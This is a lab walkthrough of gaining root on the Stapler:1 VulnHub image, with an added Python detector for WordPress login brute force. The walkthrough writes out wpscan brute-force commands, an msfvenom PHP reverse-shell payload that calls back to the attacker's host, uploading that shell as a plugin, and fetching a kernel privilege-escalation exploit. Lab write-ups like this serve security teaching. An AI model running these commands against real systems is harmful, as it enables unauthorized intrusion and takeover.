This is a walkthrough of how I gained root access to the Stapler:1 image from Vulnhub.com. This walkthrough is being provided for educational purposes only. All testing on this image was done in an isolated lab environment. Understand that using the tools in this walkthrough against a host without permission is against the law. Be smart folks, and enjoy the walkthrough.
Full NMAP Scan of host:
root@kali:~# nmap -p- -A 192.168.1.235
There are a lot of ports/services to enumerate here. After some time, my enumeration of port 12380 uncovered some interesting things.
Enumerating port 12380 using Nikto:
root@kali:~# nikto -h https://192.168.1.235:12380
Nikto scan found the robots.txt file and 2 entries within. Investigating these brings me to a WordPress page.
Using WPScan to get version and plugin info:
root@kali:~# wpscan --url https://192.168.1.235:12380/blogblog/
WordPress version is 4.2.1. I didn’t find anything useful regarding plugins or versions.
Using WPScan to enumerate users:
root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ --enumerate u
Using WPScan to brute force login (starting with john):
root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou.txt --username john
I am able to login to WordPress using the credentials john/incorrect. Now to create a reverse shell payload.
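Defender's view of the step above, as an added example that is not part of the original walkthrough: a WPScan password attack shows up in the web server's access log as a burst of POSTs to wp-login.php from one client (a failed WordPress login re-renders the form with HTTP 200; a success redirects with 302). The log lines below are constructed for the example, not taken from the image, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines: one client hammering wp-login.php,
# then a 302 when a password finally works; a second client browsing normally.
SAMPLE_LOG = """\
192.168.1.234 - - [10/Jul/2016:13:01:01 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:02 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:02 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:03 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:04 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:05 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
192.168.1.234 - - [10/Jul/2016:13:01:06 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 302 0
192.168.1.50 - - [10/Jul/2016:13:01:10 +0000] "GET /blogblog/ HTTP/1.1" 200 9120
192.168.1.50 - - [10/Jul/2016:13:01:40 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3712
"""

# client, timestamp, method, path, status (request line tail such as HTTP/1.1 is skipped)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}


def find_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: peak_failures} for clients with >= threshold failed
    wp-login.php POSTs inside any sliding window of the given length."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"].endswith("/wp-login.php") and ev["status"] == 200:
            failures[ev["ip"]].append(ev["time"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"possible wp-login brute force from {ip}: {n} failures in 60s")
```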
Creating reverse shell payload using Msfvenom:
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.234 LPORT=4444 -f raw > shell235.php
Uploading my .php reverse shell to the plugins page:
Browse to plugins -> add new -> upload plugins. Find the PHP shell file and upload it. In my case, the file is shell235.php.
After clicking install now the next page will ask for an FTP path and FTP credentials. You don’t have to do anything here, the file has been uploaded.
Verifying the .php file has been uploaded:
As you can see, my shell235.php is here. Now let’s get our Metasploit handler ready to catch this shell.
Metasploit handler options:
Execute the reverse shell by clicking on shell235.php:
Catching low privilege shell:
As you can see from the screenshot, we are connected via the low privilege user www-data.
OS Enumeration provides the kernel and Linux flavor/version:
Searching the local Exploit DB for privilege escalation vulnerabilities:
root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16
Identified a local privilege escalation exploit. EDB-ID 39772/CVE-2016-4557. POC code can be found/downloaded here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Transferred exploit code using WGET:
Running exploit code:
Exploit code worked!